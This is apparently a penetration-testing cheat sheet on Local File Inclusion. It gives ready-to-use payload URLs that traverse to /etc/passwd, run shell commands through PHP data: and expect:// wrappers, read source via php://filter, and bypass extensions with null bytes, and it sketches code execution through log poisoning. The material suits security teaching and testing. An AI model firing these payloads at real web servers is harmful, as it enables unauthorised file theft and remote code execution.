LFI (Local File Inclusion)
# Identification
File Inclusion vulnerabilities are usually easy to identify. The common case is to have a GET parameter in the url that indicates which page to load.
http://www.example.com?page=login
# Exploitation
Try to load known system files as /etc/passwd in Linux. If the target file doesn't get rendered, keep adding ../ until the file is reached.
http://www.example.com?page=../../../../../../etc/passwd
The following cheatsheet (by @DragonJAR) contains a list of common *nix payloads to exploit on a LFI vulnerability.
RCE via log poisoning
Being able to load the access / error logs (i.e.: apache logs), by smuggling code statements in some requests, those statements could be executed later when loading the logs.
RCE by including /proc/self/environ
If the file /proc/self/environ can be loaded in the vulnerable page, it is possible to execute code by sending statements on the User-Agent HTTP Request.
# Tricks
PHP Wrappers
Inject code directly into the page:
http://www.example.com?page=data:text/plain,hello friend
http://www.example.com?page=data:text/plain,<?php echo shell_exec("ls")?>
Execute system commands via the expect wrapper (disabled by default):
http://www.example.com?page=expect://ls
Encode the file's content in Base64 and include it in the page (useful to read PHP files instead of executing them):
http://www.example.com?page=php://filter/convert.base64-encode/resource=/etc/passwd
Escape file extension by adding Null Byte
Sometimes the web application adds a file extension to the requested file (i.e.: .php). By adding a Null Byte "%00" at the end of the requested file, it might be possible to bypass that.
http://www.example.com?page=/etc/passwd%00
http://www.example.com?page=/etc/passwd%2500
Sources
LFI Cheat Sheet by @Arr0wayHow To Hack A Website Using Local File Inclusion (LFI) by @SunnyHoi
Local File Inclusion (LFI) — Web Application Penetration Testing by @AptiveSec
LFI payloads for *NIX environments by @DragonJAR
PHP: Supported Protocols and Wrappers - PHP Manual